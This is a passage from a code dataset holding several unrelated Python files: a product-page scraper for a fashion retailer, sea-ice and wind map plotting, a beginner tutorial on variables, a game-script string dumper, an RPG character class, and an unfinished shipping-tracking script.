re.search('zoompopup_fg\\.php\\?id=(\\d+)&', s360)\r\n urls = \"\"\r\n if m:\r\n for i in range(1, 25):\r\n if i < 10:\r\n idx = \"0%d\" % i\r\n else:\r\n idx = \"%d\" % i\r\n urls = urls + 
\"http://madeleine.scoopzoom.de/img/360/%s/%s.jpg,\" % (m.group(1), idx)\r\n item[\"images360\"] = urls[:-1]\r\n\r\n m = re.search('_ArticleVideoViewUrl = \"(.*)\"', s360)\r\n if m:\r\n item[\"video_url\"] = m.group(1)\r\n\r\n # ------path_related------\r\n\r\n related_urls = response.xpath(\"//div[@id='tc-content300']/div/div/ul/li/a/@data-href\").extract()\r\n path_related = \"\"\r\n for related_url in related_urls:\r\n path_related = path_related + related_url[23:] + \",\"\r\n\r\n item[\"path_related\"] = path_related[:-1]\r\n\r\n # ------path_upsell------\r\n\r\n upsell_urls = response.xpath(\"//div[@id='mav2-outfit-list-ext']/div[@class='scroll']/ul/li/a/@href\").extract()\r\n path_upsell = \"\"\r\n for upsell_url in upsell_urls:\r\n path_upsell = path_upsell + upsell_url + \",\"\r\n\r\n item[\"path_upsell\"] = path_upsell[:-1]\r\n\r\n # ------breadcrumbs------\r\n\r\n google_tag_params = response.xpath(\"substring-before(substring-after(//script[contains(text(), 'var google_tag_params =')], '%s'), '%s')\" % (\"pcat: \", \", \")).extract()[0]\r\n breadcrumbs_list = google_tag_params[1:-1].split(\",\")\r\n breadcrumbs_list.reverse()\r\n\r\n breadcrumbs = \", \".join(breadcrumbs_list)\r\n item[\"breadcrumbs\"] = breadcrumbs\r\n\r\n # ------id_supplier------\r\n\r\n item[\"id_supplier\"] = \"000000002\"\r\n\r\n # ------sizes------\r\n\r\n sizes = \"\"\r\n\r\n productData = json.loads(response.xpath(\"substring-before(substring-after(//script[contains(text(), 'var productData=')], 'var productData='), ';')\").extract()[0])\r\n kdbnrSxData = json.loads(response.xpath(\"substring-before(substring-after(//script[contains(text(), 'var kdbnrSxData=')], 'var kdbnrSxData='), ';')\").extract()[0])\r\n articleData = json.loads(response.xpath(\"substring-before(substring-after(//script[contains(text(), 'var articleData=')], 'var articleData='), ';')\").extract()[0])\r\n availabilityTextLookUp = json.loads(response.xpath(\"substring-before(substring-after(//script[contains(text(), 'var availabilityTextLookUp=')], 'var availabilityTextLookUp='), ';')\").extract()[0])\r\n\r\n #print \"!!!!!\", response.body_as_unicode()\r\n\r\n sizes_in_tabs = []\r\n tabs_names = []\r\n\r\n sizes_cont = response.xpath(\"//div[@id='sizeParent']/div\")\r\n\r\n tabs = sizes_cont.xpath(\"div/ul/li[contains(@id, 'tc-tab')]\")\r\n\r\n for tab in tabs:\r\n if tab.xpath(\"span[@class='st-icon']\"):\r\n tabs_names.append([tab.xpath(\"string(span[@class='st-icon'])\").extract()[0], tab.xpath(\"string(span[@class!='st-icon'])\").extract()[0]])\r\n else:\r\n tabs_names.append([\"\", tab.xpath(\"string(span)\").extract()[0]])\r\n num_tab = tab.xpath(\"substring-after(@id, 'tc-tab')\").extract()[0]\r\n\r\n sizes_x = sizes_cont.xpath(\"div[@id='tc-content%s']/div/div/div\" % num_tab)\r\n\r\n sizes_names = []\r\n\r\n for size_x in sizes_x:\r\n sizes_names.append(\"\".join(size_x.xpath(\"string(.)\").extract()))\r\n sizes_in_tabs.append(sizes_names)\r\n\r\n for article in articleData.keys():\r\n sizes = sizes + \"%s:\" % article\r\n for i, tab_name in enumerate(tabs_names):\r\n sizes = sizes + \"%s:%s::\" % (tab_name[0], tab_name[1])\r\n for size in sizes_in_tabs[i]:\r\n size_c = re.sub(\"[,/\\s+]\", \"\", size)\r\n for size_data in articleData[article]:\r\n if size_data[0] == size_c:\r\n if size_data[2] == 3 or size_data[2] == 6:\r\n sizes = sizes + \"!%s|\" % size\r\n else:\r\n sizes = sizes + \"%s|\" % size\r\n sizes = sizes + \"%s^\" % availabilityTextLookUp[\"%d\" % size_data[2]]\r\n break\r\n sizes = sizes[:-1] + \";\"\r\n sizes 
= sizes[:-1] + \"#\"\r\n\r\n item[\"sizes\"] = sizes[:-1]\r\n\r\n # ------price and old_price------\r\n\r\n price = \"\"\r\n\r\n for article in productData.keys():\r\n for i, tab_name in enumerate(tabs_names):\r\n for size in sizes_in_tabs[i]:\r\n size_c = re.sub(\"[,/\\s+]\", \"\", size)\r\n if productData[article][\"Sizes\"].get(size_c) == None:\r\n continue\r\n size_data = productData[article][\"Sizes\"][size_c]\r\n\r\n price = price + \"%s:\" % article\r\n price = price + \"%s:\" % tab_name[1]\r\n price = price + \"%s:\" % size\r\n price = price + \"%s:\" % size_data[\"Price\"].replace(\",\", \".\")\r\n\r\n if size_data[\"SalePrice\"] == None:\r\n price = price + \"N;\"\r\n else:\r\n price = price + \"%s;\" % size_data[\"SalePrice\"].replace(\",\", \".\")\r\n if not tabs_names:\r\n size_data = productData[article][\"Sizes\"][\"ohne\"]\r\n\r\n price = price + \"%s:::%s:\" % (article, size_data[\"Price\"].replace(\",\", \".\"))\r\n\r\n if size_data[\"SalePrice\"] == None:\r\n price = price + \"N;\"\r\n else:\r\n price = price + \"%s;\" % size_data[\"SalePrice\"].replace(\",\", \".\")\r\n\r\n item[\"price\"] = price[:-1]\r\n\r\n # ------images------\r\n\r\n images = \"\"\r\n\r\n general_image = response.xpath(\"string(//meta[@property='og:image']/@content)\").extract()[0]\r\n if general_image:\r\n url_l = general_image.split(\"_\")\r\n url_l[1] = \"0\"\r\n url_l[2] = \"0\"\r\n url_l[3] = \"0\"\r\n url_l[4] = \"0\"\r\n general_image = \"_\".join(url_l)\r\n\r\n images = \"%s;\" % general_image\r\n\r\n imgToKdbnrsx_text = response.xpath(\"substring-before(substring-after(//script[contains(text(), 'var imgToKdbnrsx=')], 'var imgToKdbnrsx='), ';')\").extract()[0].replace(\"'\", \"\\\"\")\r\n\r\n if imgToKdbnrsx_text:\r\n imgToKdbnrsx = json.loads(imgToKdbnrsx_text, object_pairs_hook=collections.OrderedDict)\r\n\r\n sizes_imgs = []\r\n\r\n pos = 0\r\n pos_end = 0\r\n while True:\r\n pos = response.body_as_unicode().find(\"ArticleZoom.addImage(\", pos_end)\r\n if pos == -1: break\r\n pos_end = response.body_as_unicode().find(\");\", pos)\r\n sizes_imgs.append(json.loads(response.body_as_unicode()[pos + 21:pos_end]))\r\n\r\n for article in kdbnrSxData.keys():\r\n url = kdbnrSxData[article][\"Url\"]\r\n url_l = url.split(\"_\")\r\n url_l[1] = \"0\"\r\n url_l[2] = \"0\"\r\n url_l[3] = \"0\"\r\n url_l[4] = \"0\"\r\n img_id = kdbnrSxData[article][\"ImageId\"]\r\n\r\n if imgToKdbnrsx:\r\n for img in imgToKdbnrsx.keys():\r\n if imgToKdbnrsx[img] == article:\r\n url = \"\"\r\n for s in sizes_imgs:\r\n if img == str(s[\"id\"]):\r\n url_l[5] = str(s[\"width\"])\r\n ur = url_l[6].split(\"/\")\r\n ur[0] = str(s[\"height\"])\r\n url_l[6] = \"/\".join(ur)\r\n url = \"_\".join(url_l)\r\n\r\n images = images + \"%s:%s;\" % (article, url.replace(img_id, img))\r\n else:\r\n images = images + \"%s:%s\" % (article, url)\r\n\r\n else:\r\n for article in kdbnrSxData.keys():\r\n url = kdbnrSxData[article][\"Url\"]\r\n item[\"images\"] = images[:-1]\r\n\r\n # ------colors------\r\n\r\n colors_groups = dict()\r\n\r\n for article in productData.keys():\r\n colors_group = productData[article][\"ColorFamilyName\"]\r\n article_color = [article, productData[article][\"ColorName\"], \"http://a2.madcdn.net/img/cache/colors/%d.jpg\" % productData[article][\"ColorId\"]]\r\n if colors_groups.get(colors_group) == None:\r\n colors_groups[colors_group] = []\r\n colors_groups[colors_group].append(article_color)\r\n\r\n request = Request(url=\"http://www.madeleine.de/suche/ihre-suche-%s/\" % productData.keys()[0], 
callback=self.parse_themes)\r\n request.meta['item'] = item\r\n request.meta['colors_groups'] = colors_groups\r\n\r\n return request\r\n\r\n\r\n def parse_themes(self, response):\r\n item = response.meta['item']\r\n colors_groups = response.meta['colors_groups']\r\n\r\n themes = response.xpath(\"//div[@class='sf_items sf_colors'][2]/ul/li/@title\").extract()\r\n\r\n item[\"themes\"] = \",\".join(themes)\r\n\r\n if colors_groups.get('varies') != None:\r\n colors_groups[\"varies_res\"] = list(colors_groups[\"varies\"])\r\n colors = []\r\n colors_x = response.xpath(\"//div[@class='sf_items sf_colors'][1]/ul/li\")\r\n for color_x in colors_x:\r\n colors.append([color_x.xpath(\"@title\").extract()[0], color_x.xpath(\"substring-after(a/@href, '=')\").extract()[0]])\r\n\r\n\r\n color = colors.pop(0)\r\n request = Request(url=\"http://www.madeleine.de%s?cf=%s\" % (item[\"path\"], color[1]) , callback=self.find_colors)\r\n request.meta['item'] = item\r\n request.meta['colors_groups'] = colors_groups\r\n request.meta['cur_color'] = color[0]\r\n request.meta['colors'] = colors\r\n\r\n return request\r\n else:\r\n item[\"colors\"] = self.make_colors(colors_groups)\r\n self.check_item(item)\r\n return item\r\n\r\n def find_colors(self, response):\r\n item = response.meta['item']\r\n colors_groups = response.meta['colors_groups']\r\n cur_color = response.meta['cur_color']\r\n colors = response.meta['colors']\r\n\r\n varies = colors_groups.get(\"varies\")\r\n\r\n if not response.xpath(\"//body[contains(@class, 'tab-invalidlink')]\"):\r\n #article = response.xpath(\"string(//span[@id='orderNo'])\").extract()[0].replace(' ', '')\r\n img_id = response.xpath(\"substring-after(//img[contains(@id, 'mainImage')]/@id, '-')\").extract()[0]\r\n\r\n kdbnrSxData = json.loads(response.xpath(\"substring-before(substring-after(//script[contains(text(), 'var kdbnrSxData=')], 'var kdbnrSxData='), ';')\").extract()[0])\r\n\r\n for i, color in enumerate(varies):\r\n if kdbnrSxData.get(color[0])[\"ImageId\"] == img_id:\r\n col = varies[i]\r\n\r\n for j, color_var in enumerate(colors_groups['varies_res']):\r\n if (color_var[0] == varies[i][0]):\r\n colors_groups['varies_res'].pop(j)\r\n if colors_groups.get(cur_color) == None:\r\n colors_groups[cur_color] = []\r\n colors_groups[cur_color].append(col)\r\n break\r\n\r\n if colors:\r\n color = colors.pop(0)\r\n request = Request(url=\"http://www.madeleine.de%s?cf=%s\" % (item[\"path\"], color[1]) , callback=self.find_colors)\r\n request.meta['item'] = item\r\n request.meta['colors_groups'] = colors_groups\r\n request.meta['cur_color'] = color[0]\r\n request.meta['colors'] = colors\r\n return request\r\n else:\r\n item[\"colors\"] = self.make_colors(colors_groups)\r\n self.check_item(item)\r\n return item\r\n\r\n def make_colors(self, colors_groups):\r\n result = \"\"\r\n\r\n for group in colors_groups.keys():\r\n if group == \"varies\":\r\n continue\r\n\r\n if not colors_groups[group]:\r\n continue\r\n\r\n #if group == \"varies_res\" and colors_groups['varies_res']:\r\n # result = result + \"::\"\r\n #else:\r\n result = result + \"%s::\" % group\r\n\r\n for color in colors_groups[group]:\r\n result = result + \"%s:%s:%s,\" % (color[1], color[0], color[2])\r\n result = result[:-1] + \";\"\r\n\r\n return result[:-1]\r\n\r\n def check_item(self, item):\r\n for i, key in enumerate(item.keys()):\r\n if item.get(key) != None:\r\n if item[key]:\r\n self.check_values[i] = 1\r\n\r\n def result_check(self):\r\n result = True\r\n for v in self.check_values:\r\n if v == 0:\r\n result = 
False\r\n return result\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"madeleine/src/spiders/madeleinespider.py","file_name":"madeleinespider.py","file_ext":"py","file_size_in_byte":23066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"392797711","text":"# Visualization\nfrom mpl_toolkits.basemap import Basemap\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\nimport calc_data\n\ng = np.arange(0,145,1)\npoints = np.meshgrid(g, g)\n\n#####################################################################\n# Map projection with Basemap\n\ndef visual_map(data, mode, submode, save_name, show):\n\t\"\"\"\n\tVisualize wind factor, deflection angle, correlation coefficient, etc.\n\tdata: regression data\n\tmode:\n\t\t0: 1 data\n\t\t1: >2 data\n\t\t2: ic0_900\n\t\"\"\"\n\tlon, lat = calc_data.get_lonlat(latlon145_file_name, array=True)\n\tlonlat_data = [lon, lat]\n\n\tif mode == 0:\n\t\tif submode == \"w_speed\":\n\t\t\tdata = data.loc[:, [\"data_idx\", \"w_u\", \"w_v\", \"w_speed\", \"Label\", \"Name\"]]\n\t\t\tdata_type = \"type_wind\"\n\t\telif submode == \"iw_speed\":\n\t\t\tdata = data.loc[:, [\"data_idx\", \"iw_u\", \"iw_v\", \"iw_speed\", \"Label\", \"Name\"]]\n\t\t\tdata_type = \"type_wind\"\n\t\telif submode == \"real_iw_speed\":\n\t\t\tdata = data.loc[:, [\"data_idx\", \"real_iw_u\", \"real_iw_v\", \"real_iw_speed\", \"Label\", \"Name\"]]\n\t\t\tdata_type = \"type_wind\"\n\n\t\telif submode == \"A_by_day\":\n\t\t\tdata = data.loc[:, [\"data_idx\", \"A_by_day\", \"Label\", \"Name\"]]\n\t\t\tdata_type = \"type_non_wind\"\n\t\telif submode == \"theta_by_day\":\n\t\t\tdata = data.loc[:, [\"data_idx\", \"theta_by_day\", \"Label\", \"Name\"]]\n\t\t\tdata_type = \"type_non_wind\"\n\t\telif submode == \"ic0_145\":\n\t\t\tdata = data.loc[:, [\"data_idx\", \"ic0_145\", \"Label\", \"Name\"]]\n\t\t\tdata_type = \"type_non_wind\"\n\t\telif submode == \"A\":\n\t\t\tdata = data.loc[:, [\"data_idx\", \"A\", \"Label\", \"Name\"]]\n\t\t\tdata_type = \"type_non_wind\"\n\t\telif submode == \"angle\":\n\t\t\tdata = data.loc[:, [\"data_idx\", \"angle\", \"Label\", \"Name\"]]\n\t\t\tdata_type = \"type_non_wind\"\n\t\telif submode == \"coef\":\n\t\t\tdata = data.loc[:, [\"data_idx\", \"coef\", \"Label\", \"Name\"]]\n\t\t\tdata_type = \"type_non_wind\"\n\n\t\tplot_2_map(data, data_type, lonlat_data, points)\n\n\telif mode == 1:\n\t\t#submode: [\"w_speed\", \"ic0_145\", ...]\n\t\tfor item in submode:\n\t\t\tvisual_map(data, mode=0, submode=item, save_name=None, show=False)\n\telif mode == 2:\n\t\tic0_file_name, latlon900_file_name = data[0], data[1]\n\t\tplot_ic0_900(ic0_file_name, latlon900_file_name)\n\t\n\tif show == True:\n\t\tplt.show()\n\tif save_name is not None:\n\t\tplt.savefig(save_name, dpi=1200)\n\n\ndef plot_ic0_900(ic0_file_name, latlon900_file_name):\n\t# Visualize the IC0 sea-ice data (read from csv)\n\tdf0 = pd.read_csv(ic0_file_name, header=None)\n\tic0 = np.array(df0, dtype='float32')\n\tic0 = np.ma.masked_invalid(ic0)\n\tice_grid = np.reshape(ic0, (900,900))\n\t\n\tdf1 = pd.read_csv(latlon900_file_name, header=None)\n\tlatlon = np.array(df1, dtype='float32')\n\tx_lon = latlon[:,0]\n\ty_lat = latlon[:,1]\n\t\n\tm = Basemap(lon_0=180, boundinglat=40, resolution='i', projection='npstere')\n\tfig = plt.figure(figsize=(7,7))\n\t\n\t# Draw the grid\n\t#m.plot(x_lon,y_lat,'bo', markersize=0.3)\n\txx = np.reshape(x_lon, (900,900))\n\tyy = np.reshape(y_lat, (900,900))\n\t\n\tm.drawcoastlines(color = '0.15')\n\tm.pcolormesh(xx, yy, ice_grid, 
cmap=plt.cm.jet)\n\tm.colorbar(location='bottom')\n\ndef plot_2_map(data, data_type, lonlat_data, points):\n\tlon, lat = lonlat_data[0], lonlat_data[1]\n\tm = Basemap(lon_0=180, boundinglat=50, resolution='i', projection='npstere')\n\tfig = plt.figure(figsize=(7, 7))\n\n\tx, y = m(lon, lat)\n\tx1 = np.reshape(x, (145,145), order='F')\n\ty1 = np.reshape(y, (145,145), order='F')\n\t\n\tm.drawcoastlines(color = '0.15')\n\n\tif data_type == \"type_wind\":\n\t\tdata[data.data_idx==0.] = np.nan\n\t\tvector_u = np.ma.masked_invalid(np.array(data.iloc[:,1]))\n\t\tvector_v = np.ma.masked_invalid(np.array(data.iloc[:,2]))\n\t\tvector_speed = np.ma.masked_invalid(np.array(data.iloc[:,3]))\n\n\t\t# Draw the wind vectors (changed from visual_2)\n\t\tm.quiver(x, y, vector_u, vector_v, vector_speed)\n\t\t#m.quiver(x, y, vector_u, vector_v, vector_speed, angles='xy', scale_units='xy')\n\n\telif data_type == \"type_non_wind\":\n\t\tdata[data.data_idx==0.] = np.nan\n\t\tplot_data = np.array(data.iloc[:,1])\n\n\t\t# Write any fine-tuning adjustments here\n\t\t#plot_data[plot_data>=0.05] = np.nan\n\t\t#plot_data = np.absolute(plot_data)\n\t\t#plot_data[(plot_data>50) | (plot_data<-50)] = np.nan\n\n\t\tplot_data = np.ma.masked_invalid(plot_data)\n\t\tplot_data1 = np.reshape(plot_data, (145,145), order='F')\n\t\t\n\t\tm.pcolormesh(x1, y1, plot_data1, cmap=plt.cm.jet)\n\t\tm.colorbar(location='bottom')\n\n\telse:\n\t\tplot_data = np.array(data.iloc[:,1])\n\t\tplot_data = np.ma.masked_invalid(plot_data)\n\t\tm.scatter(x, y, marker='o', color = \"b\", s=1.2, alpha=0.9)\n\n#############################################################################################\n# Non-time-series plots\n\ndef visual_non_line(data, mode, save_name, show):\n\t\"\"\"\n\tVisualize geostrophic-wind-minus-current speed against sea-ice drift speed for a given day\n\tConnects from the get_wind_ic0_regression_data function in calc_data\n\tdata: calc_data.get_wind_ic0_regression_data(...)\n\t\"\"\"\n\t# Unpack mode\n\tmode_1, mode_2 = mode[0], mode[1]\n\tdata = data.dropna()\n\t#print (data.head(3))\n\t\n\t# Plot\n\tsns.set_style(\"darkgrid\")\n\tif mode_1 == \"scatter\":\n\t\tx_data, y_data = data[mode_2[0]], data[mode_2[1]]\n\t\t# Any required preprocessing goes here\n\n\t\tsns.jointplot(x=x_data, y=y_data, kind=\"reg\")\n\t\t#sns.regplot(x=x_data, y=y_data)\n\telif mode_1 == \"hist\":\n\t\tx_data = data[mode_2]\n\t\t# Any required preprocessing goes here\n\n\t\tsns.distplot(x_data)\n\telif mode_1 == \"custom\":\n\t\tsns.distplot(data[\"A_by_day\"])\n\n\tif show == True:\n\t\tplt.show()\n\tif save_name is not None:\n\t\tplt.savefig(save_name, dpi=1200)\n\n#############################################################################################\n# Time-series plots\n\ndef visual_ts(data):\n\t\"\"\"\n\tPlot a DataFrame-typed data object\n\t[Reference]\n\thttp://sinhrks.hatenablog.com/entry/2015/11/15/222543\n\t\"\"\"\n\t\n\t# Plain time-series plot\n\t\t\n\ttmp = pd.to_datetime(data[\"date\"])\n\tdata[\"date\"] = data.index\n\tdata.index = tmp\n\tdata = data.rename(columns={'date': 'idx'})\n\t\n\t#data[[\"wind\", \"ice\"]].plot(figsize=(16,4), alpha=0.5)\n\t\"\"\"\n\tax = data.wind.plot(figsize=(16,4), ylim=(0, 30), color=\"blue\" )\n\tax2 = ax.twinx()\n\tdata.ice.plot( ax=ax2, ylim=(0, 0.8), color=\"red\" )\n\t\"\"\"\n\t\n\t\n\tplt.show()\n\t\n\t# Case where the time axes differ (share axis)\n\n\n\n\n#############################################################################################\t\n\n\n\n\n\n\n\n\n\n\n","sub_path":"visual/visual_3/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":6170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"441900243","text":"#variables are one of the most important things in python\n#variables basically store 
values \n\n# example 1\n\nA=1\n\nprint (A)\n\n'''output'''\n\n# 1\n\n\n# example 2\n\nA=1\nB=2\n\nsum=A+B\n\nprint (sum)\n\n'''output'''\n# 3\n\n# example 3 storing a string value \n\nA='hi am dev bhattacharjee'\n\nprint (A) \n\n'''output'''\n\n# hi am dev bhattacharjee \n\n# example 4 printing multiple values using variables \n\nA='I am '\nF='dev bhattacharjee'\nG='Rahul Das'\n\nprint (A , F) #to print multiple values you must put a [ , ] between the variables or strings \nprint (A , G) #see how it saves my time\n\n'''output'''\n\n# I am dev bhattacharjee \n# I am Rahul Das\n\n# example 5 swapping values [basic / common]\n\nA=1\nB=2\n\nC=A #here we assign the value of A to C, so C is 1\nB=C #here we change the value of B, and now it is 1\n\nprint (B)\n\n'''output'''\n\n# 1\n\n# example 6 swapping values [advanced]\n\nA=1\nB=2\n\nA,B=B,A #here A's value is shifted to B and B's value is shifted to A\n\nprint (B)\nprint (A)\n\n'''output'''\n\n# 1\n# 2\n\n'''now you can move forward to the next topic'''\n\n","sub_path":"chapter1/variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"506281570","text":"import os\nimport struct\nimport tools\nimport configparser\nfrom io import BytesIO\nfrom ctypes import create_string_buffer\n\n\ndef dump_bin(data: bytes) -> configparser.ConfigParser:\n data = BytesIO(data)\n config = configparser.ConfigParser()\n \n # Read offset of bin\n data.seek(0x10)\n bin_offset = struct.unpack(\">I\", data.read(4))[0]\n data.seek(bin_offset)\n end_offset = struct.unpack(\">I\", data.read(4))[0]\n data.seek(bin_offset)\n file_count = (end_offset - bin_offset) // 4\n\n # Read strings\n dumped = []\n for file in range(file_count):\n offset = struct.unpack(\">I\", data.read(0x04))[0]\n next_offset = data.tell()\n if offset == 0x00:\n break\n data.seek(offset)\n \n # Extract string\n string = b\"\"\n while True:\n byte = data.read(1)\n if byte == b\"\\x00\":\n break\n string += byte\n dumped.append(string.decode(\"cp932\"))\n\n # Go to next offset\n data.seek(next_offset)\n \n # Get file size\n data.seek(0, 2)\n file_size = data.tell()\n\n config[\"data\"] = {\n \"offset\": bin_offset,\n \"size\": file_size - bin_offset,\n \"translated\": 0\n }\n config[\"strings\"] = {}\n\n for i, string in enumerate(dumped, start=1):\n config[\"strings\"][f\"string{i}\"] = string\n\n data.close()\n return config\n\n\ndef dump_scripts(script_path: str):\n files = tools.extract_cat(script_path)\n os.makedirs(os.path.join(\"scripts\", \"npg11\"), exist_ok=True)\n for i, file in enumerate(files):\n with open(os.path.join(\"scripts\", \"npg11\", f\"{i}.ini\"), \"w\", encoding=\"cp932\") as f:\n config = dump_bin(file)\n config.write(f)\n print(f\"Extracted {i}\")\n\n\nif __name__ == \"__main__\":\n dump_scripts(\"script/script.cat\")\n","sub_path":"dump_scripts.py","file_name":"dump_scripts.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"504342233","text":"from math import log2\n\nfrom enums.Attributes import Attributes\nfrom enums.Stats import Stats\nfrom model.Equipment import Equipment\n\n\nclass Character:\n EQUIPMENT_SLOTS = 5\n ITEM_STORAGE = 20\n\n def __init__(self, character_name):\n self.exp = 0\n self.max_life = 0\n self.available_points = 10\n self.base_stats = dict()\n self.character_stats = dict()\n self.character_name = character_name\n 
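# --- Editor's example (hypothetical, not part of the dataset): the two
# primitives the dump_scripts record above is built on, isolated for clarity --
# reading big-endian uint32 offsets with struct, and accumulating a
# NUL-terminated cp932 string from a BytesIO buffer.
import struct
from io import BytesIO

def read_u32_be(buf):
    return struct.unpack('>I', buf.read(4))[0]

def read_cstring(buf, encoding='cp932'):
    out = b''
    while True:
        byte = buf.read(1)
        if byte in (b'', b'\x00'):  # stop at NUL or end of buffer
            return out.decode(encoding)
        out += byte

demo = BytesIO(b'\x00\x00\x00\x08abc\x00')
assert read_u32_be(demo) == 8 and read_cstring(demo) == 'abc'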
self.worn_equipment = []\n        self.character_inventory = []\n        self.character_level = 100\n        self._init_worn_equip_and_stats()\n        self.calculate_full_stats()\n\n    def allocate_points(self, amount, stat):\n        # spend unallocated points on a stat; on failure report the remaining pool\n        if self.available_points >= amount:\n            self.available_points -= amount\n            self.base_stats[stat] += amount\n            return True\n        return self.available_points\n\n    def _init_worn_equip_and_stats(self):\n        for slot in range(self.EQUIPMENT_SLOTS):\n            self.worn_equipment += [None]\n        for full_stat in list(Stats) + list(Attributes):\n            self.character_stats[full_stat] = 0\n        for stat in list(Stats):\n            self.base_stats[stat] = 5\n            self.character_stats[stat] = 5\n        return\n\n    def store_item(self, equipment):\n        if len(self.character_inventory) >= self.ITEM_STORAGE:\n            return False\n        else:\n            self.character_inventory += [equipment]\n            return True\n\n    def drop_item(self, equipment):\n        for item in self.character_inventory:\n            if item == equipment:\n                self.character_inventory.remove(equipment)\n                return True\n        return False\n\n    def equip_item(self, equipment):\n        slots = equipment.get_equipment_type().value[1]\n        if isinstance(slots, tuple) and self.worn_equipment[1] is not None and self.worn_equipment[0] is not None and len(\n                self.character_inventory) > self.ITEM_STORAGE - 2:\n            return False\n        self.drop_item(equipment)\n        if isinstance(slots, tuple):\n            for slot in list(slots):\n                if self.worn_equipment[slot] is not None:\n                    self.store_item(self.worn_equipment[slot])\n                    self.worn_equipment[slot] = None\n            self.worn_equipment[int(slots[0])] = equipment\n        else:\n            if self.worn_equipment[slots] is not None:\n                self.store_item(self.worn_equipment[slots])\n            self.worn_equipment[int(slots)] = equipment\n\n        self.calculate_full_stats()\n        return True\n\n    def __str__(self):\n        return \"%s level: %d\" % (self.character_name, self.character_level)\n\n    def unequip_item(self, equipment):\n        if len(self.character_inventory) < self.ITEM_STORAGE:\n            self.character_inventory.append(equipment)\n            self.worn_equipment[equipment.get_equipment_type().value[1]] = None\n            self.calculate_full_stats()\n            return True\n        return False\n\n    def calculate_full_stats(self):\n        for full_stat in list(Stats) + list(Attributes):\n            self.character_stats[full_stat] = 0\n\n        for stat in self.base_stats:\n            self.character_stats[stat] += self.base_stats[stat]\n        for item in self.worn_equipment:\n            if item is not None:\n                for stat in item.get_stats():\n                    self.character_stats[stat] += item.get_stats()[stat][1]\n\n        self.calculate_life()\n        return True\n\n    def calculate_life(self):\n        life = 500 + self.character_level * 5 + (\n                (self.character_stats[Stats.Stamina]) * log2(1 + self.character_level)) + log2(\n            self.character_stats[Stats.Strength]) * self.character_level\n        life += self.character_stats[Attributes.life]\n        self.max_life = int(life)\n\n    def get_stats(self):\n        return_list = dict()\n        for stat in self.character_stats:\n            if self.character_stats[stat] != 0:\n                return_list[stat] = self.character_stats[stat]\n        return return_list\n\n    def encrypt(self):\n        encrypt = self.encrypt_name() + str(chr(0))\n        encrypt += '0x%04X' % self.available_points + str(chr(0))\n        encrypt += '0x%02X' % self.character_level + str(chr(0))\n        for stat in self.base_stats:\n            encrypt += chr(stat.value[0] + 65)\n            encrypt += '0x%04X' % self.base_stats[stat] + str(chr(0))\n        for item in self.worn_equipment:\n            if item is None:\n                encrypt += str(chr(1))\n            else:\n                encrypt += item.encrypt()\n            encrypt += chr(0)\n        for item in self.character_inventory:\n            encrypt += item.encrypt() + chr(0)\n        return encrypt\n\n    
def decrypt(self, decryption_string):\n        decrypt = decryption_string.split(chr(0))\n        self.decrypt_name(decrypt[0])\n        self.available_points = int(decrypt[1], 16)\n        self.character_level = int(decrypt[2], 16)\n        decrypt = decrypt[3:]\n        for stat in range(len(list(Stats))):\n            self.base_stats[Stats.get_stat(ord(decrypt[0][:1]))] = int(decrypt[0][1:], 16)\n            decrypt = decrypt[1:]\n\n        for item in range(self.EQUIPMENT_SLOTS):\n            if decrypt[0] == chr(1):\n                add = None\n            else:\n                add = Equipment()\n                add.full_import(decrypt[0])\n\n            self.worn_equipment[item] = add\n            decrypt = decrypt[1:]\n        for item in range(len(decrypt) - 1):\n            add = Equipment()\n            add.full_import(decrypt[0])\n            # the remaining tokens are stored inventory items, mirroring encrypt()\n            self.character_inventory.append(add)\n            decrypt = decrypt[1:]\n        return True\n\n    def encrypt_name(self):\n        encrypted_name = \"\"\n        for char in self.character_name:\n            encrypted_name += chr(ord(char) + 124)\n        return encrypted_name\n\n    def decrypt_name(self, name):\n        encrypted_name = \"\"\n        for char in name:\n            encrypted_name += chr(ord(char) - 124)\n        self.character_name = encrypted_name\n        return encrypted_name\n","sub_path":"model/Character.py","file_name":"Character.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"641212590","text":"from zeep import Client\nimport base64\nimport xml.etree.cElementTree as ET\nfrom xml.etree.ElementTree import tostring\nfrom util import *\n\n\ndef envioArticulosAmazon():\n    print(\"envioArticulosAmazon\")\n    cx = creaConexion()\n    print(\"conectado\")\n    # cx[\"cur\"].execute(\"SELECT nombre FROM eg_fichprocesados WHERE tipo = 'AZ_ENVIOARTICULOS'\")\n    # rows = cx[\"cur\"].fetchall()\n    # if len(rows) > 0:\n    #     return True\n\n    print(\"sigue\")\n    # cx[\"cur\"].execute(\"INSERT INTO eg_fichprocesados (estado,hora,tipo,nombre,fecha) VALUES ('En proceso',CURRENT_TIME,'AZ_ENVIOARTICULOS','AZ_ENVIOARTICULOS',CURRENT_DATE)\")\n    # cx[\"conn\"].commit()\n\n    try:\n        cx[\"cur\"].execute(\"SELECT az.barcode AS barcode FROM az_articulospublicados az WHERE az.sincronizado = false and az.activo = true limit 1\")\n\n        rows = cx[\"cur\"].fetchall()\n        print(len(rows))\n        barcode = False\n        wsdl = 'https://clientes.mrw.es:4433/TrackingService.svc?wsdl'\n        client = Client(wsdl)\n\n        if len(rows) > 0:\n            for q in rows:\n                barcode = str(q[\"barcode\"])\n                print(barcode)\n                requestData = {\n                    'Product': {\n                        'SKU': barcode,\n                        'StandardProductID': barcode,\n                    }\n                }\n\n                response = client.service.GetEnvios(**requestData)\n                print(response)\n\n                # if len(response.Seguimiento.Abonado) > 0:\n                #     if len(response.Seguimiento.Abonado[0].SeguimientoAbonado.Seguimiento) > 0:\n                #         estadoEntregaMrw = str(response.Seguimiento.Abonado[0].SeguimientoAbonado.Seguimiento[0].Estado)\n                #         descEstadoentregaMrw = 